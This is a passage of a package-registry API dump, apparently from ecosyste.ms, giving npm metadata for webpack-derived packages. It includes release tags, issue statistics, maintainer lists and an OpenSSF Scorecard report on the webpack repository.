0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2024-09-05T14:43:47.536Z","dependent_packages_count":0,"downloads":13,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":54.12805865929274,"dependent_repos_count":25.30552159382132,"dependent_packages_count":32.889739249478886,"stargazers_count":0.09384754309936047,"forks_count":0.5402831095039192,"average":22.591490031039246},"purl":"pkg:npm/wip-overall-departed-scorebook-paralyze-genre","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/wip-overall-departed-scorebook-paralyze-genre","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/wip-overall-departed-scorebook-paralyze-genre","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/wip-overall-departed-scorebook-paralyze-genre/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2024-09-03T16:23:49.007Z","issues_count":9960,"pull_requests_count":7135,"avg_time_to_close_issue":10519004.079605531,"avg_time_to_close_pull_request":2515008.9860069244,"issues_closed_count":9780,"pull_requests_closed_count":6931,"pull_request_authors_count":1314,"issue_authors_count":6509,"avg_comments_per_issue":5.8597389558232935,"avg_comments_per_pull_request":3.2229852838121933,"merged_pull_requests_count":4784,"bot_issues_count":0,"bot_pull_requests_count":2306,"past_year_issues_count":334,"past_year_pull_requests_count":720,"past_year_avg_time_to_close_issue":2072740.8647686832,"past_year_avg_time_to_close_pull_request":1141641.627090301,"past_year_issues_closed_count":278,"past_year_pull_requests_closed_count":597,"past_year_pull_request_authors_count":75,"past_year_issue_authors_count":244,"past_year_avg_comments_per_issue":1.9550898203592815,"past_year_avg_comments_per_pull_request":2.0375,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":395,"past_year_merged_pull_requests_count":341,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1361,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":256,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":197,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":176,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"chenxsan","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"ScriptedAlchemy","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"evenstensberg","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"Connormiha","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"mc-zone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"burhanuday","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"eemeli","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"PatrickJS","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":122,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"snitin315","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"evenstensberg","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"vankop","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"chenxsan","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"smelukov","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/wip-overall-departed-scorebook-paralyze-genre/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/wip-overall-departed-scorebook-paralyze-genre/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/wip-overall-departed-scorebook-paralyze-genre/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/wip-overall-departed-scorebook-paralyze-genre/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/wip-overall-departed-scorebook-paralyze-genre/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/wip-overall-departed-scorebook-paralyze-genre/codemeta","maintainers":[{"uuid":"emperdeon","login":"emperdeon","name":null,"email":"emperdeon@pm.me","url":null,"packages_count":1,"html_url":"https://www.npmjs.com/~emperdeon","role":null,"created_at":"2022-11-16T07:08:39.223Z","updated_at":"2022-11-16T07:08:39.223Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/emperdeon/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2568968,"name":"webpack-zxg","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2020-01-05T12:02:22.715Z","latest_release_published_at":"2020-01-05T14:01:59.688Z","latest_release_number":"5.0.0-beta.12","last_synced_at":"2026-09-03T01:23:00.547Z","created_at":"2022-04-10T03:39:30.319Z","updated_at":"2026-09-03T01:23:00.547Z","registry_url":"https://www.npmjs.com/package/webpack-zxg","install_command":"npm install webpack-zxg","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.0.0-beta.12"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies 